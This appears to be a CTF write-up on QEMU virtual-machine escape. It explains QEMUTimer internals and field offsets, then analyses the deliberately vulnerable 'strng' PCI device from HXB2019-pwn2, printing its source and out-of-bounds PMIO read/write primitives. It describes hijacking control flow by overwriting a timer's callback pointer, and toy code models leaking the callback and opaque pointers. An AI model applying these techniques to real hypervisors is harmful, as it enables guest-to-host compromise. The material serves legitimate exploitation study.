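static int64_t toy_vclock_get(const ToyVirtualClock *c, int64_t host_ns)
{
    return c->running ? host_ns - c->offset_ns : c->frozen_ns;
}

/* VM paused: remember the current virtual time and stop advancing. */
static void toy_vclock_stop(ToyVirtualClock *c, int64_t host_ns)
{
    if (c->running) {
        c->frozen_ns = host_ns - c->offset_ns;
        c->running = false;
    }
}

/* VM resumed: continue from the frozen value. */
static void toy_vclock_start(ToyVirtualClock *c, int64_t host_ns)
{
    assert(host_ns >= 0);
    if (!c->running) {
        c->offset_ns = host_ns - c->frozen_ns;
        c->running = true;
    }
}
```

A timer armed on such a clock simply does not get closer to its deadline while the VM is paused, which is why device timeouts do not fire in bulk after a long stop in the debugger.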
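In short, a QEMUTimer is "an alarm callback attached to one QEMUClock timeline". Its everyday workflow in a device model is: register write → compute the deadline → timer_mod() → raise an IRQ or perform DMA when it fires.

Because a QEMUTimer stores a function pointer and an argument pointer that the event loop calls when the timer expires, QEMU escapes commonly hijack control flow by corrupting QEMUTimer-related structures.

QEMUTimer-related structures

The relevant functions and structures are: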
```c
struct QEMUTimerList {
    QEMUClock *clock;
    QemuMutex active_timers_lock;
    QEMUTimer *active_timers;           /* sorted list of armed timers */
    QLIST_ENTRY(QEMUTimerList) list;
    QEMUTimerListNotifyCB *notify_cb;   /* wakes the event loop */
    void *notify_opaque;

    QemuEvent timers_done_ev;
};

typedef struct QEMUClock {
    QLIST_HEAD(, QEMUTimerList) timerlists;

    QEMUClockType type;
    bool enabled;
} QEMUClock;

struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds; -1 when inactive */
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;            /* called with opaque on expiry */
    void *opaque;
    QEMUTimer *next;
    int attributes;
    int scale;
};

struct QemuMutex {
    pthread_mutex_t lock;
#ifdef CONFIG_DEBUG_MUTEX
    const char *file;
    int line;
#endif
    bool initialized;
};

typedef enum {
    QEMU_CLOCK_REALTIME = 0,
    QEMU_CLOCK_VIRTUAL = 1,
    QEMU_CLOCK_HOST = 2,
    QEMU_CLOCK_VIRTUAL_RT = 3,
    QEMU_CLOCK_MAX
} QEMUClockType;

struct QEMUTimerListGroup {
    QEMUTimerList *tl[QEMU_CLOCK_MAX];  /* one list per clock type */
};

extern QEMUTimerListGroup main_loop_tlg;
```
The structures relate to each other as follows:
classDiagram
direction LR
class QEMUTimer {
expire_time : int64_t (0x00)
timer_list : QEMUTimerList* (0x08)
cb : QEMUTimerCB* (0x10)
opaque : void* (0x18)
next : QEMUTimer* (0x20)
attributes : int (0x28)
scale : int (0x2C)
size : 0x30
}
class QemuMutex {
lock : pthread_mutex_t (0x00, 0x28)
initialized : bool (0x28)
size : 0x30
}
class QEMUClock {
timerlists_lh_first : QEMUTimerList* (0x00)
type : QEMUClockType (0x08)
enabled : bool (0x0C)
size : 0x10
}
class QEMUTimerList {
clock : QEMUClock* (0x00)
active_timers_lock : QemuMutex (0x08, 0x30)
active_timers : QEMUTimer* (0x38)
list.le_next : QEMUTimerList* (0x40)
list.le_prev : QEMUTimerList** (0x48)
notify_cb : QEMUTimerListNotifyCB* (0x50)
notify_opaque : void* (0x58)
timers_done_ev : QemuEvent (0x60, 0x08)
size : 0x68
}
class QEMUTimerListGroup {
tl_0_REALTIME : QEMUTimerList* (0x00)
tl_1_VIRTUAL : QEMUTimerList* (0x08)
tl_2_HOST : QEMUTimerList* (0x10)
tl_3_VIRTUAL_RT: QEMUTimerList* (0x18)
size : 0x20
}
QEMUClock o-- QEMUTimerList : timerlists
QEMUTimerList --> QEMUClock : clock
QEMUTimerList o-- QEMUTimer : active_timers
QEMUTimer --> QEMUTimer : next
QEMUTimer --> QEMUTimerList : timer_list
QEMUTimerList --> QemuMutex : active_timers_lock
QEMUTimerListGroup o-- QEMUTimerList : tl_*
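The offsets in the diagram for QEMUTimer can be re-derived with `offsetof` on a struct that has the same field order. The sketch below uses a stand-in type `ToyTimer` (not QEMU's header) and assumes a 64-bit ABI with 8-byte pointers, as on x86-64 Linux; on other ABIs the numbers differ.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef void ToyTimerCB(void *opaque);

/* Same field order as the struct QEMUTimer listing above. */
typedef struct ToyTimer {
    int64_t expire_time;
    void *timer_list;
    ToyTimerCB *cb;
    void *opaque;
    struct ToyTimer *next;
    int attributes;
    int scale;
} ToyTimer;

static const struct {
    const char *name;
    size_t offset;
} toy_timer_layout[] = {
    { "expire_time", offsetof(ToyTimer, expire_time) },
    { "timer_list",  offsetof(ToyTimer, timer_list) },
    { "cb",          offsetof(ToyTimer, cb) },
    { "opaque",      offsetof(ToyTimer, opaque) },
    { "next",        offsetof(ToyTimer, next) },
    { "attributes",  offsetof(ToyTimer, attributes) },
    { "scale",       offsetof(ToyTimer, scale) },
};

/* Look up a field offset by name; returns -1 for unknown fields. */
static long toy_timer_offset(const char *field)
{
    size_t n = sizeof(toy_timer_layout) / sizeof(toy_timer_layout[0]);

    assert(field != NULL);
    for (size_t i = 0; i < n; i++) {
        if (strcmp(toy_timer_layout[i].name, field) == 0) {
            return (long)toy_timer_layout[i].offset;
        }
    }
    return -1;
}
```

Knowing that `cb` and `opaque` sit at fixed offsets inside the timer is what lets an attacker with a relative write target them precisely.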
Using QEMUTimer

```c
typedef struct {
    QEMUTimer *tmr;
    int64_t period_ns;
} MyDev;

static void my_cb(void *opaque)
{
    MyDev *s = opaque;
    /* Device work goes here; call timer_mod_ns() again for periodic use. */
}

static void my_realize(MyDev *s)
{
    s->tmr = timer_new_ns(QEMU_CLOCK_VIRTUAL, my_cb, s);
    s->period_ns = 5 * 1000 * 1000;     /* 5 ms */

    int64_t now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);
    timer_mod_ns(s->tmr, now + s->period_ns);
}

static void my_unrealize(MyDev *s)
{
    timer_del(s->tmr);      /* make sure it is off the active list first */
    timer_free(s->tmr);
}
```
The timer_new_* functions create a QEMUTimer; all of them end up in timer_init_full.
pwndbg> bt
#0 timer_init_full (ts=0x55555580e330 <_start>, timer_list_group=0x7fffffffd9e0, type=QEMU_CLOCK_REALTIME, scale=48, attributes=256, cb=0x7ffff76bab95 <__libc_calloc+133>, opaque=0x0) at ../util/qemu-time 1
#1 0x0000555555c914e2 in timer_new_full (timer_list_group=0x0, type=QEMU_CLOCK_VIRTUAL_RT, scale=1, attributes=0, cb=0x555555c916c5 <cpu_throttle_timer_tick>, opaque=0x0) at /home/flyyy/Desktop/qemu-vul/q 4
#2 0x0000555555c91527 in timer_new (type=QEMU_CLOCK_VIRTUAL_RT, scale=1, cb=0x555555c916c5 <cpu_throttle_timer_tick>, opaque=0x0) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/qemu/timer.h :544
#3 0x0000555555c91553 in timer_new_ns (type=QEMU_CLOCK_VIRTUAL_RT, cb=0x555555c916c5 <cpu_throttle_timer_tick>, opaque=0x0) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/qemu/timer.h :562
#4 0x0000555555c9189b in cpu_throttle_init () at ../softmmu/cpu-throttle.c :120
#5 0x0000555555c41869 in cpu_timers_init () at ../softmmu/cpu-timers.c :278
#6 0x0000555555be5b99 in qemu_init (argc=18, argv=0x7fffffffdda8, envp=0x7fffffffde40) at ../softmmu/vl.c :4256
#7 0x000055555580e445 in main (argc=18, argv=0x7fffffffdda8, envp=0x7fffffffde40) at ../softmmu/main.c :49
#8 0x00007ffff7643083 in __libc_start_main (main=0x55555580e419 <main>, argc=18, argv=0x7fffffffdda8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdd98) at .. 8
#9 0x000055555580e35e in _start ()
This function initializes the QEMUTimer. It sets expire_time to -1, which marks the timer as inactive: it is not on any active list yet, so the callback will not run until the timer is armed.

```c
void timer_init_full(QEMUTimer *ts,
                     QEMUTimerListGroup *timer_list_group, QEMUClockType type,
                     int scale, int attributes,
                     QEMUTimerCB *cb, void *opaque)
{
    /* Fall back to the main loop's timer lists when no group is given. */
    if (!timer_list_group) {
        timer_list_group = &main_loop_tlg;
    }
    ts->timer_list = timer_list_group->tl[type];
    ts->cb = cb;
    ts->opaque = opaque;
    ts->scale = scale;
    ts->attributes = attributes;
    ts->expire_time = -1;
}
```
Later, timer_mod_ns() inserts the timer into a list sorted by expiry time. If it becomes the new list head, the framework interrupts poll and recomputes the deadline (rearm) so that it fires as soon as possible.

```c
void timer_mod_ns(QEMUTimer *ts, int64_t expire_time)
{
    QEMUTimerList *timer_list = ts->timer_list;
    bool rearm;

    qemu_mutex_lock(&timer_list->active_timers_lock);
    timer_del_locked(timer_list, ts);       /* unlink if already armed */
    rearm = timer_mod_ns_locked(timer_list, ts, expire_time);
    qemu_mutex_unlock(&timer_list->active_timers_lock);

    if (rearm) {
        timerlist_rearm(timer_list);
    }
}

static bool timer_mod_ns_locked(QEMUTimerList *timer_list,
                                QEMUTimer *ts, int64_t expire_time)
{
    QEMUTimer **pt, *t;

    /* Find the insertion point: first entry that expires later than ts. */
    pt = &timer_list->active_timers;
    for (;;) {
        t = *pt;
        if (!timer_expired_ns(t, expire_time)) {
            break;
        }
        pt = &t->next;
    }
    ts->expire_time = MAX(expire_time, 0);
    ts->next = *pt;
    qatomic_set(pt, ts);

    /* True when ts became the new head, so the deadline must be recomputed. */
    return pt == &timer_list->active_timers;
}
```
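The sorted insert and its "became the new head" return value are easy to try outside QEMU. The sketch below mirrors the loop in timer_mod_ns_locked() on a stripped-down `ToyTimer` type (an invented name); it leaves out locking, atomics, and the preceding timer_del_locked() call.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef struct ToyTimer {
    int64_t expire_time;
    struct ToyTimer *next;
} ToyTimer;

/* Insert ts in ascending expire_time order, after existing entries with
 * the same deadline. Returns true when ts became the new list head,
 * i.e. when the caller would have to rearm the poll timeout. */
static bool toy_timer_insert(ToyTimer **head, ToyTimer *ts, int64_t expire_time)
{
    ToyTimer **pt = head;

    assert(head != NULL && ts != NULL);
    while (*pt && (*pt)->expire_time <= expire_time) {
        pt = &(*pt)->next;
    }
    ts->expire_time = expire_time < 0 ? 0 : expire_time;
    ts->next = *pt;
    *pt = ts;
    return pt == head;
}
```

Inserting deadlines 50, 80, and 10 in that order yields the list 10 → 50 → 80, and only the first and last insert report that a rearm is needed.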
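QEMUTimerList callback

The notify_cb callback of a QEMUTimerList only wakes up or notifies the event loop; it does no device work. Its type is QEMUTimerListNotifyCB, which, unlike the per-timer QEMUTimerCB, also receives the clock type:

```c
typedef void QEMUTimerListNotifyCB(void *opaque, QEMUClockType type);
```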
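Its job is to interrupt the poll/epoll sleep and trigger a deadline recalculation when the earliest deadline changes or when a clock is re-enabled. If notify_cb is not set, qemu_notify_event() is used by default.

The typical trigger path is "the earliest deadline changed → the poll timeout must be reset or the sleep interrupted". For example, when timer_mod*() is called on a timer and it becomes the list head (the new earliest deadline, which includes insertion into an empty list): timer_mod*() → timer_mod_ns_locked() sorted insert → reports that a rearm is needed → timerlist_rearm() → timerlist_notify() → notify_cb(opaque, type) (or qemu_notify_event() if unset).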
pwndbg> bt
#0 qemu_timer_notify_cb (opaque=0x1c1768ab8f0, type=QEMU_CLOCK_REALTIME) at ../softmmu/cpu-timers.c :243
#1 0x0000555555e9c62d in timerlist_notify (timer_list=0x55555691b1e0) at ../util/qemu-timer.c :300
#2 0x0000555555e9c9b9 in timerlist_rearm (timer_list=0x55555691b1e0) at ../util/qemu-timer.c :424
#3 0x0000555555e9cae2 in timer_mod_ns (ts=0x55555696bfa0, expire_time=895342000368) at ../util/qemu-timer.c :452
#4 0x0000555555e9cc28 in timer_mod (ts=0x55555696bfa0, expire_time=895342000368) at ../util/qemu-timer.c :481
#5 0x0000555555b918ce in apic_timer_update (s=0x55555689d800, current_time=893574944608) at ../hw/intc/apic.c :623
#6 0x0000555555b91f4d in apic_mem_write (opaque=0x55555689d800, addr=896, val=110440984, size=4) at ../hw/intc/apic.c :826
#7 0x0000555555c08105 in memory_region_write_accessor (mr=0x55555689d890, addr=896, value=0x7ffff504be98, size=4, shift=0, mask=4294967295, attrs=...) at ../softmmu/memory.c :491
#8 0x0000555555c0833c in access_with_adjusted_size (addr=896, value=0x7ffff504be98, size=4, access_size_min=1, access_size_max=4, access_fn=0x555555c08018 <memory_region_write_accessor>, mr=0x55555689d8902
#9 0x0000555555c0b3ef in memory_region_dispatch_write (mr=0x55555689d890, addr=896, data=110440984, op=MO_32, attrs=...) at ../softmmu/memory.c :1501
#10 0x0000555555bc8b0c in io_writex (env=0x5555569448d0, iotlbentry=0x7fffa868c1e0, mmu_idx=2, val=110440984, addr=18446744073699054464, retaddr=140736193352078, op=MO_32) at ../accel/tcg/cputlb.c :1378
#11 0x0000555555bcb3d5 in store_helper (env=0x5555569448d0, addr=18446744073699054464, val=110440984, oi=34, retaddr=140736193352078, op=MO_32) at ../accel/tcg/cputlb.c :2397
#12 0x0000555555bcb64d in helper_le_stl_mmu (env=0x5555569448d0, addr=18446744073699054464, val=110440984, oi=34, retaddr=140736193352078) at ../accel/tcg/cputlb.c :2463
#13 0x00007fffb2cfd18e in code_gen_buffer ()
#14 0x0000555555b95552 in cpu_tb_exec (cpu=0x55555693c070, itb=0x7fffb306c500 <code_gen_buffer+12760275>) at ../accel/tcg/cpu-exec.c :178
#15 0x0000555555b96403 in cpu_loop_exec_tb (cpu=0x55555693c070, tb=0x7fffb306c500 <code_gen_buffer+12760275>, last_tb=0x7ffff504c5b8, tb_exit=0x7ffff504c5b0) at ../accel/tcg/cpu-exec.c :658
#16 0x0000555555b966fb in cpu_exec (cpu=0x55555693c070) at ../accel/tcg/cpu-exec.c :771
#17 0x0000555555bab751 in tcg_cpu_exec (cpu=0x55555693c070) at ../accel/tcg/tcg-cpus.c :243
#18 0x0000555555babcc2 in tcg_cpu_thread_fn (arg=0x55555693c070) at ../accel/tcg/tcg-cpus.c :427
#19 0x0000555555e77a29 in qemu_thread_start (args=0x55555696b890) at ../util/qemu-thread-posix.c :521
#20 0x00007ffff781b609 in start_thread (arg=<optimized out>) at pthread_create.c :477
#21 0x00007ffff773e353 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S :95
The other case is re-enabling a clock: if qemu_clock_enable(type, true) takes the clock from disabled to enabled → qemu_clock_notify(type) → for every QEMUTimerList attached to that clock, timerlist_notify() → notify_cb(opaque, type). This case is less common than the previous one.

timerlist_notify is defined as follows:

```c
void timerlist_notify(QEMUTimerList *timer_list)
{
    if (timer_list->notify_cb) {
        timer_list->notify_cb(timer_list->notify_opaque, timer_list->clock->type);
    } else {
        qemu_notify_event();
    }
}
```
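QEMUTimer callback

The cb callback of a QEMUTimer is the timer's actual work callback. Once the timer has expired and been unlinked from the active_timers list, cb(opaque) is called with the list lock released. For periodic behavior, the callback must re-arm itself with timer_mod*() for the next deadline.

On each pass of the event loop, timerlist_run_timers() reads the current clock time and fires as long as the head timer has expire_time <= now: it first unlinks the timer from the list and sets expire_time to -1, then calls cb(opaque) without holding the lock. If further expired timers are at the head, the loop continues.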
pwndbg> bt
#0 0x0000555555e9cd99 in timerlist_run_timers (timer_list=0x55555691b1e0) at ../util/qemu-timer.c :545
#1 0x0000555555e9cf28 in qemu_clock_run_timers (type=QEMU_CLOCK_VIRTUAL) at ../util/qemu-timer.c :588
#2 0x0000555555e9d20a in qemu_clock_run_all_timers () at ../util/qemu-timer.c :670
#3 0x0000555555ea1763 in main_loop_wait (nonblocking=0) at ../util/main-loop.c :531
#4 0x0000555555bde240 in qemu_main_loop () at ../softmmu/vl.c :1678
#5 0x000055555580e44a in main (argc=18, argv=0x7fffffffdda8, envp=0x7fffffffde40) at ../softmmu/main.c :50
#6 0x00007ffff7643083 in __libc_start_main (main=0x55555580e419 <main>, argc=18, argv=0x7fffffffdda8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdd98) at .. 8
#7 0x000055555580e35e in _start ()
```c
bool qemu_clock_run_all_timers(void)
{
    bool progress = false;
    QEMUClockType type;

    for (type = 0; type < QEMU_CLOCK_MAX; type++) {
        if (qemu_clock_use_for_deadline(type)) {
            progress |= qemu_clock_run_timers(type);
        }
    }

    return progress;
}

bool qemu_clock_run_timers(QEMUClockType type)
{
    return timerlist_run_timers(main_loop_tlg.tl[type]);
}

bool timerlist_run_timers(QEMUTimerList *timer_list)
{
    QEMUTimer *ts;
    int64_t current_time;
    bool progress = false;
    QEMUTimerCB *cb;
    void *opaque;

    if (!qatomic_read(&timer_list->active_timers)) {
        return false;
    }

    qemu_event_reset(&timer_list->timers_done_ev);
    if (!timer_list->clock->enabled) {
        goto out;
    }

    switch (timer_list->clock->type) {
    case QEMU_CLOCK_REALTIME:
        break;
    default:
    case QEMU_CLOCK_VIRTUAL:
        break;
    case QEMU_CLOCK_HOST:
        if (!replay_checkpoint(CHECKPOINT_CLOCK_HOST)) {
            goto out;
        }
        break;
    case QEMU_CLOCK_VIRTUAL_RT:
        if (!replay_checkpoint(CHECKPOINT_CLOCK_VIRTUAL_RT)) {
            goto out;
        }
        break;
    }

    current_time = qemu_clock_get_ns(timer_list->clock->type);
    qemu_mutex_lock(&timer_list->active_timers_lock);
    while ((ts = timer_list->active_timers)) {
        if (!timer_expired_ns(ts, current_time)) {
            /* No expired timers left. */
            break;
        }
        if (replay_mode != REPLAY_MODE_NONE
            && timer_list->clock->type == QEMU_CLOCK_VIRTUAL
            && !(ts->attributes & QEMU_TIMER_ATTR_EXTERNAL)
            && !replay_checkpoint(CHECKPOINT_CLOCK_VIRTUAL)) {
            qemu_mutex_unlock(&timer_list->active_timers_lock);
            goto out;
        }

        /* Unlink the timer before calling the callback. */
        timer_list->active_timers = ts->next;
        ts->next = NULL;
        ts->expire_time = -1;
        cb = ts->cb;
        opaque = ts->opaque;

        /* Run the callback without holding the list lock. */
        qemu_mutex_unlock(&timer_list->active_timers_lock);
        cb(opaque);
        qemu_mutex_lock(&timer_list->active_timers_lock);

        progress = true;
    }
    qemu_mutex_unlock(&timer_list->active_timers_lock);

out:
    qemu_event_set(&timer_list->timers_done_ev);
    return progress;
}
```
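The pop-then-call loop and the "re-arm yourself for periodic behavior" rule can be tried in a few lines of standalone C. The sketch below is a single-threaded toy with invented `Toy*` names; it keeps one global list and omits locking, replay checkpoints, and clock handling.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef struct ToyTimer ToyTimer;
typedef void ToyTimerCB(void *opaque);

struct ToyTimer {
    int64_t expire_time;
    ToyTimerCB *cb;
    void *opaque;
    ToyTimer *next;
};

static ToyTimer *toy_active;            /* head of the sorted active list */

/* Arm ts for expire_time (sorted insert, as in timer_mod_ns_locked). */
static void toy_timer_mod(ToyTimer *ts, int64_t expire_time)
{
    ToyTimer **pt = &toy_active;

    while (*pt && (*pt)->expire_time <= expire_time) {
        pt = &(*pt)->next;
    }
    ts->expire_time = expire_time;
    ts->next = *pt;
    *pt = ts;
}

/* Fire every timer whose deadline is <= now; returns true if any ran. */
static bool toy_run_timers(int64_t now)
{
    bool progress = false;
    ToyTimer *ts;

    while ((ts = toy_active) && ts->expire_time <= now) {
        toy_active = ts->next;          /* unlink first ... */
        ts->next = NULL;
        ts->expire_time = -1;
        assert(ts->cb != NULL);
        ts->cb(ts->opaque);             /* ... then call back */
        progress = true;
    }
    return progress;
}

/* A periodic "device": the callback re-arms its own timer. */
typedef struct ToyDev {
    ToyTimer tmr;
    int64_t next_due;
    int64_t period;
    int fired;
} ToyDev;

static void toy_dev_tick(void *opaque)
{
    ToyDev *d = opaque;

    d->fired++;
    d->next_due += d->period;
    toy_timer_mod(&d->tmr, d->next_due);
}
```

Note that the loop calls whatever pointer sits in `cb` with whatever sits in `opaque`; it performs no validation, which is why overwriting those two fields of an armed timer is enough to redirect execution.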
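So we can hijack control flow by overwriting the cb function pointer of the QEMUTimer that the active_timers field of a QEMUTimerList in main_loop_tlg points to.

The QEMUTimer's expire_time is usually set to 0 for this. Any value that is not greater than the current time satisfies timer_head->expire_time <= current_time; otherwise the callback is never called.

```c
static bool timer_expired_ns(QEMUTimer *timer_head, int64_t current_time)
{
    return timer_head && (timer_head->expire_time <= current_time);
}
```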
HXB2019-pwn2

The virtual machine's password is root.

Environment setup

libiscsi.so.2 is missing, so the dependency has to be built:

```bash
sudo apt update
sudo apt install -y autoconf automake libtool pkg-config gettext \
    make gcc g++
git clone https://github.com/sahlberg/libiscsi.git
cd libiscsi
./autogen.sh
./configure
make
```

Then swap in the freshly built libiscsi.so.11.0.2:

```bash
patchelf --replace-needed libiscsi.so.2 ./libiscsi.so.11.0.2 qemu-system-x86_64
```
Vulnerability analysis

```c
#include "qemu/osdep.h"
#include "qemu/timer.h"
#include "qemu/module.h"
#include "qom/object.h"
#include "hw/pci/pci.h"
#include "exec/memory.h"
#include <stdlib.h>

#define TYPE_STRNG "strng"
#define STRNG(obj) OBJECT_CHECK(STRNGState, (obj), TYPE_STRNG)

typedef struct STRNGState {
    PCIDevice pdev;
    MemoryRegion mmio;
    MemoryRegion pmio;
    uint32_t addr;          /* PMIO "address" register */
    uint32_t flag;
    uint32_t regs[64];
    QEMUTimer strng_timer;  /* sits directly after regs */
} STRNGState;

static void strng_instance_init(Object *obj);
static void strng_class_init(ObjectClass *oc, void *data);
static void strng_timer(void *opaque);
static void pci_strng_uninit(PCIDevice *pdev);
static void pci_strng_realize(PCIDevice *pdev, Error **errp);
static uint64_t strng_mmio_read(void *opaque, hwaddr addr, unsigned size);
static void strng_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);
static uint64_t strng_pmio_read(void *opaque, hwaddr addr, unsigned size);
static void strng_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);

static const MemoryRegionOps strng_mmio_ops = {
    .read = strng_mmio_read,
    .write = strng_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
};

static const MemoryRegionOps strng_pmio_ops = {
    .read = strng_pmio_read,
    .write = strng_pmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
};

static void strng_timer(void *opaque)
{
    STRNGState *s = opaque;
    s->flag = 0;
}

static void strng_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    STRNGState *s = opaque;

    if (size == 4) {
        if (addr == 0) {
            s->addr = (uint32_t)val;
        } else if (addr == 4) {
            if ((s->addr & 3) == 0) {
                uint32_t index = s->addr >> 2;   /* no upper bound check */
                if (index == 1) {
                    s->regs[1] = rand();
                } else if (index != 0) {
                    if (index == 3) {
                        s->regs[3] = rand_r(&s->regs[2]);
                    } else {
                        s->regs[index] = (uint32_t)val;
                        if (s->flag) {
                            int64_t now = qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL);
                            timer_mod(&s->strng_timer, now + 100);
                        }
                    }
                } else {
                    srand((unsigned)val);
                }
            }
        }
    }
}

static uint64_t strng_pmio_read(void *opaque, hwaddr addr, unsigned size)
{
    STRNGState *s = opaque;

    if (size != 4) {
        return (uint64_t)-1;
    }
    if (addr == 0) {
        return s->addr;
    }
    if (addr == 4) {
        if ((s->addr & 3) != 0) {
            return (uint64_t)-1;
        }
        return s->regs[s->addr >> 2];            /* no upper bound check */
    }
    return (uint64_t)-1;
}

static void strng_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    STRNGState *s = opaque;
    uint32_t seed = (uint32_t)val;

    if (size == 4 && ((addr & 3) == 0)) {
        uint32_t index = addr >> 2;
        if (index == 1) {
            s->regs[1] = rand();
        } else if (index != 0) {
            if (index == 3) {
                s->regs[3] = rand_r(&s->regs[2]);
            }
            s->flag = 1;
            s->regs[index] = seed;
        } else {
            srand((unsigned)val);
        }
    }
}

static uint64_t strng_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    STRNGState *s = opaque;

    if (size == 4 && ((addr & 3) == 0)) {
        return s->regs[addr >> 2];
    }
    return (uint64_t)-1;
}

static void pci_strng_uninit(PCIDevice *pdev)
{
    STRNGState *s = STRNG(pdev);
    timer_del(&s->strng_timer);
}

static void pci_strng_realize(PCIDevice *pdev, Error **errp)
{
    STRNGState *s = STRNG(pdev);

    timer_init_ms(&s->strng_timer, QEMU_CLOCK_VIRTUAL, strng_timer, s);

    /* BAR0: 0x100 bytes of MMIO; BAR1: 8 bytes of port I/O. */
    memory_region_init_io(&s->mmio, OBJECT(pdev), &strng_mmio_ops, s,
                          "strng-mmio", 0x100);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);

    memory_region_init_io(&s->pmio, OBJECT(pdev), &strng_pmio_ops, s,
                          "strng-pmio", 8);
    pci_register_bar(pdev, 1, PCI_BASE_ADDRESS_SPACE_IO, &s->pmio);
}

static void strng_instance_init(Object *obj)
{
    STRNGState *s = STRNG(obj);
    s->flag = 0;
}

static void strng_class_init(ObjectClass *oc, void *data)
{
    PCIDeviceClass *k = PCI_DEVICE_CLASS(oc);

    k->realize = pci_strng_realize;
    k->exit = pci_strng_uninit;
    k->vendor_id = 0x1234;
    k->device_id = 0x11E9;
    k->revision = 0x10;
    k->class_id = PCI_CLASS_OTHERS;
}

static const TypeInfo strng_info = {
    .name = TYPE_STRNG,
    .parent = TYPE_PCI_DEVICE,
    .instance_size = sizeof(STRNGState),
    .instance_init = strng_instance_init,
    .class_init = strng_class_init,
};

static void pci_strng_register_types(void)
{
    type_register_static(&strng_info);
}
type_init(pci_strng_register_types)
```
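The device's read and write handlers work as follows:

```c
strng_mmio_read(void *opaque, hwaddr addr, unsigned size);
```

Condition: size == 4 and addr % 4 == 0; otherwise it returns -1.
Returns: regs[addr >> 2]. BAR0 is fixed at 0x100 bytes, so QEMU only routes accesses with addr in [0, 0xFC] to the handler, and there is no out-of-bounds access.

```c
strng_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);
```

Precondition: size == 4 and addr % 4 == 0; let idx = addr >> 2.
idx == 0 (addr == 0): srand(val)
idx == 1 (addr == 4): regs[1] = rand() (flag is not set)
idx == 3 (addr == 12): first regs[3] = rand_r(&regs[2]), then flag = 1; regs[3] = (uint32_t)val (the random number is overwritten, and the seed in regs[2] is updated by rand_r)
Any other idx in {2, 4..63}: flag = 1; regs[idx] = (uint32_t)val. This relies on the BAR0 = 0x100 bound and cannot go out of bounds.

```c
strng_pmio_read(void *opaque, hwaddr addr, unsigned size);
```

Condition: size == 4; otherwise it returns -1.
addr == 0: returns opaque->addr.
addr == 4: returns regs[opaque->addr >> 2] if opaque->addr is 4-byte aligned, otherwise -1. opaque->addr is never range-checked.

```c
strng_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);
```

Precondition: size == 4.
addr == 0: opaque->addr = (uint32_t)val.
addr == 4 with opaque->addr 4-byte aligned, idx = opaque->addr >> 2: idx == 0 calls srand(val); idx == 1 sets regs[1] = rand(); idx == 3 sets regs[3] = rand_r(&regs[2]); any other idx writes regs[idx] = (uint32_t)val without a bounds check and, if flag is non-zero, calls timer_mod(&strng_timer, now + 100).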
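Exploitation

Read primitives:
Via MMIO, mmio_read at offset << 2 returns the four bytes at regs[offset], but only for offset < 64, because BAR0 is 0x100 bytes long.
Via PMIO, use pmio_write to set opaque->addr = offset << 2, then call pmio_read to read the four bytes at regs[offset]. Since opaque->addr is never range-checked, offset can point past the end of regs, which gives the out-of-bounds read.

Write primitives:
Via MMIO, mmio_write at offset << 2 sets the four bytes at regs[offset] to val, again only for offset < 64.
Via PMIO, use pmio_write to set opaque->addr = offset << 2, then call pmio_write on the data port to set the four bytes at regs[offset] to val. This is the out-of-bounds write.

In pci_strng_realize() the device fixes the size of BAR0 (MMIO) at 0x100 bytes, and the MMIO handlers themselves only accept 4-byte, 4-byte-aligned accesses, so the MMIO path stays inside regs. The PMIO path has no equivalent limit on opaque->addr.

```c
memory_region_init_io(&s->mmio, OBJECT(pdev), &strng_mmio_ops, s,
                      "strng-mmio", 0x100);
pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);
```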
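To make the PMIO read primitive concrete, the toy below models only the relevant tail of the device state: `addr`, `flag`, `regs[64]`, and a timer placed right after `regs`. All `Toy*` names are invented, the layout assumes a 64-bit little-endian machine, and the out-of-bounds access is emulated with `memcpy` over the enclosing struct so the model itself stays well-defined C.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct ToyTimer {
    int64_t expire_time;
    void *timer_list;
    void (*cb)(void *);
    void *opaque;
} ToyTimer;

typedef struct ToyStrng {
    uint32_t addr;
    uint32_t flag;
    uint32_t regs[64];
    ToyTimer timer;         /* directly follows regs, as in STRNGState */
} ToyStrng;

/* Model of strng_pmio_read() on the data port: returns the 32-bit value
 * at byte offset s->addr from regs, with no bound on s->addr. */
static uint32_t toy_pmio_read_data(const ToyStrng *s)
{
    uint32_t v;
    size_t off = offsetof(ToyStrng, regs) + s->addr;

    if ((s->addr & 3) != 0) {
        return UINT32_MAX;
    }
    /* Toy-only guard: keep the model inside its own struct. */
    assert(off + sizeof(v) <= sizeof(*s));
    memcpy(&v, (const unsigned char *)s + off, sizeof(v));
    return v;
}

/* Leak a 64-bit value as two 32-bit reads (low half first). */
static uint64_t toy_leak64(ToyStrng *s, uint32_t byte_off)
{
    uint64_t lo, hi;

    s->addr = byte_off;
    lo = toy_pmio_read_data(s);
    s->addr = byte_off + 4;
    hi = toy_pmio_read_data(s);
    return lo | (hi << 32);
}
```

With this layout, byte offset 0x100 from `regs` is the timer's `expire_time`, 0x110 is `cb`, and 0x118 is `opaque`, so two 32-bit reads at 0x118 and 0x11c recover the device state pointer.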
Debugging shows the following STRNGState contents. The cb and opaque fields of strng_timer leak a QEMU image address and the STRNGState address, respectively.
